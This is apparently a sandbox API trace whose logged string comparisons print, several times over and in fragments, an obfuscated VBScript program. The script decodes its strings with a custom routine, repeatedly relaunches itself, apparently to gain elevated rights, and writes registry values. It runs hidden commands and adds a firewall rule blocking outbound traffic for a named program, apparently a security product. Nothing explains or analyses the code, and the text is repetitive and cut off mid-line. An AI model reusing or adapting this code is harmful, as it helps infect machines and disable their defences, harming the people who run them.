Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.303] wcsncmp (_String1="> 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 49 [0226.303] wcsncmp (_String1=" 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.304] wcsncmp (_String1="0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0226.304] wcsncmp (_String1=")\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.304] wcsncmp (_String1="\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif 